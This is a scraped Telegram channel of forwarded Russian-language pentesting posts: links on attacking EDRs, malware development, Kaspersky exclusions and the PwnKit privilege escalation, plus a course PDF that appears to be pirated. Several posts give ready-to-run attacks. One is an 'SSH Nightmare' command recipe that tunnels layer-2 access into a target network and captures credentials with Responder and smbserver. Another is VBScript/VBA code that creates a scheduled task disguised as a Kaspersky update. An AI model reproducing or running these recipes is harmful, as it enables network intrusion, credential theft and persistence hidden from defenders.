Pentester`s Notes – Telegram
Pentester`s Notes
190 subscribers
47 photos
2 videos
31 files
136 links
Download Telegram
Forwarded from 1N73LL1G3NC3
1N73LL1G3NC3
Attacking an EDR - Part 2 This time around, our focus will be on the communication channel between the EDR agent and its tenant. For those who are not familiar with the generic EDR architecture, in most cases the agents that will be deployed on the systems…
Attacking an EDR - Part 3

In this third and last part of this series, we will dig deeper in the EDR’s update process and uncover some logic flaws that, ultimately, led us to the complete disarmament of the solution. Additionally, as an unexpected treat for our effort, a new ‘LOLBin’ was also discovered along the way. This part will be a bit more code-heavy, we will try to minimize the unnecessary bloat but the reader might need to pivot through some additional references to get the most out of this.
Forwarded from Zer0way
https://ru-sfera.pw/forums/vvedenie-v-razrabotku-vredonosnyx-programm.176/

Интересные статьи и все собрано в одном месте. Спуфинг commandline прям понравилось
Стандартные исключения Касперского
#каспер #kes #kasper
Forwarded from Sergey
excl.txt
24 KB
#Linux #LPE #2021 #CVE

Однострочное поднятие на Debian/Ubuntu/RedHad/SUSE системах до 2021-го года (до фикса).
Требуется компилятор С

https://github.com/berdav/CVE-2021-4034
Forwarded from Magama Bazarov
Caster Ethernet Attacks ][ Version.png
127.4 KB
Forwarded from -_-
ReadytoRun stomping прогугли
И в lnk завернёшь
1
Forwarded from Zeebra
https://shorsec.io/blog/malrdp-implementing-rouge-rdp-manually/
Вот это неплохой вариант, чуть сложнее чем с lnk нагрузками
1
Forwarded from Shmelev Jaroslav
В общем, вот рецепт для тех кто хочет SSH Nightmare:
Вводные - нужен доступ к Linux-хосту от root, PermitTunnel yes и два сетевых интерфейса на машине (можно и через один, но есть риск DoS при ошибках в конфигурации). В примере рассмотрим ситуацию когда есть внешний интерфейс eth0 и интерфейс в атакуемую сеть (eth1, 10.0.0.0/24).
1) Делаем туннель:
sudo ssh -i ~/.ssh/id_rsa -o Tunnel=ethernet -w 1:1 root@<linux>
2) На локальной машине включаем интерфейс и выбираем свободный адрес в изолированной сети:
sudo ip link set tap1 up
sudo ip addr add 10.0.0.4/24 dev tap1
3) На удаленной машине делаем сетевой мост и назначаем ему адрес от интерфейса eth1:
sudo brctl addbr bridgeforattack
sudo brctl addif bridgeforattack tap1
sudo brctl addif bridgeforattack eth1
sudo ip addr del 10.0.0.2/24 dev eth1
sudo ip addr add 10.0.0.2/24 dev bridgeforattack
sudo ip link set dev tap1 up
sudo ip link set dev bridgeforattack up
Для случая с 1 интерфейсом после смены IP обязательно нужно прописать дефолтный роут, например:
sudo ip route add default via 10.0.2.1
4) Проверяем L2-доступ к сети с локальной машины:
ping -c1 10.0.0.1
5) Готовим атаку: спуфим респондером с отключенным SMB, а соединение принимаем на smbserver из impacket (респондер тоже их ловит, но часто дропает коннекты хз почему)
sudo responder -I tap1
smbserver.py -smb2support share .
6) ???

7) PROFIT!
Forwarded from Похек (Sergey Zybnev)
⚡️ Подборка ресурсов для изучения кибербеза
#подборка #awesome

➡️ Меня довольно часто спрашивают, что где почитать, где практиковаться, как начать зарабатывать. Считаю я закрыл данные вопросы надолго.

1️⃣ Видео
John Hammond
STÖK
LiveOverflow
The XSS rat
Sathvik Techtuber
Guided Hacking
NetworkChuck
Grant Collins
Positive Events
OFFZONE MOSCOW
PwnFunction
DEFCONConference
David Bombal

2️⃣ Теория
HackTricks
PayloadsAllTheThings
Xakep
Poxek
PortSwigger
SecurityLab
Codeby
Awesome DevSecOps
iOS Security Awesome
Android Security Awesome
Personal Security Checklist
RedTeam Tools
OWASP Cheat Sheet Series
six2dez pentest-book
Awesome Bugbounty Writeups
Blog INTIGRITI
PentesterLand Writeups
Pentesting AD mindmap
Conference slides

3️⃣ Практика
TryHackMe
HackTheBox
VulnHub
GoAD
Exploit-DB
PortSwigger Academy
bWAPP
WebGoat
OWASP Juice Shop
FVWA
Root-Me
OverTheWire
Crackmes
Atomic Red Team
Codeby Games
Standoff КиберПолигон

4️⃣ Заработок
HH
Хабр Карьера
BI.ZONE Bug Bounty
StandOff Bug Bounty
Yandex Bug Bounty
BUG BOUNTY RU

➡️ Также вы можете пользоваться различными нейросетями, но учитывайте, что ответы не всегда могут быть правдивые.

➡️ @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Hack IT Easy
EXP-301-2022(OSED).pdf
8.6 MB
EXP-301-2022 💻❗️

Для всех, кто спрашивал про EXP-301 - пожалуйста)
Буду рад, если кто-то поделится мнением после изучения😊

P.S. Видео тоже есть, если будет много желающих - загружу
Forwarded from Хакер — Xakep.RU
Магия SSPI. Достаем учетные данные Windows, не трогая LSASS #статьи #подписчикам

Windows позволяет разработчикам создавать шифрованные каналы связи, подписывать сообщения между клиентом и службой, аутентифицировать клиента на службе. Злоупотребляя этими возможностями, мы можем извлекать учетные данные пользователя без взаимодействия с LSASS. В этой статье я продемонстрирую, как это работает.

https://xakep.ru/2023/12/08/sspi-hack/
🔥1
Forwarded from Миша
а что значит тихое?

но вообще вот код.

Set service = CreateObject("Schedule.Service")
Call service.Connect
Dim td: Set td = service.NewTask(0)
td.RegistrationInfo.Author = "Kaspersky Corporation"
td.settings.StartWhenAvailable = True
td.settings.Hidden = False
Dim triggers: Set triggers = td.triggers
Dim trigger: Set trigger = triggers.Create(1)
Dim startTime: ts = DateAdd("s", 30, Now)
startTime = Year(ts) & "-" & Right(Month(ts), 2) & "-" & Right(Day(ts), 2) & "T" & Right(Hour(ts), 2) & ":" & Right(Minute(ts), 2) & ":" & Right(Second(ts), 2)
trigger.StartBoundary = startTime
trigger.ID = "TimeTriggerId"
Dim Action: Set Action = td.Actions.Create(0)
Action.Path = "C:\Windows\System32\cmd.exe"
Action.Arguments = "/c whoami"
Call service.GetFolder("\").RegisterTaskDefinition("AVUpdateTask", td, 6, , , 3)
Forwarded from Миша
хм, а если вот так как-нибудь?

Sub CreateScheduledTask()
Dim shell As Object
Dim TaskName As String
Dim Command As String
Dim RunTime As String
TaskName = "MyCmdTask"

Command = "cmd.exe"

RunTime = "*/10 * * * *"

Set shell = CreateObject("WScript.Shell")

shell.Run "schtasks /Create /SC MINUTE /MO 10 /TN """ & TaskName & """ /TR " & Command, , True

Set shell = Nothing

End Sub
Forwarded from Offensive Xwitter
😈 [ LuemmelSec @theluemmel ]

One Box To Rule Them All

Little write up of my way to tackle remote pentesting situations with a dropbox.

This is about non covert systems that will allow you to carry out full fledged pentests when implanted into the customers network.

🔗 https://luemmelsec.github.io/One-Box-To-Rule-Them-All/

🐥 [ tweet ]
Forwarded from Cybred
https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8

Таблица, отдельные скриншоты которой гуляют по разным чатам. Рекомендуемые коробки для подготовки к сдаче экзаменов от OffSec: PEN-200 (OSCP), PEN-300 (OSEP) и WEB-300 (OSWE).

И актуальная (последнее видео вышло 11 дней назад) серия видео с развертыванием и решением похожей локальной лаборатории: OSCP Practice Lab: Active Directory Attack Path #1, #2, #3.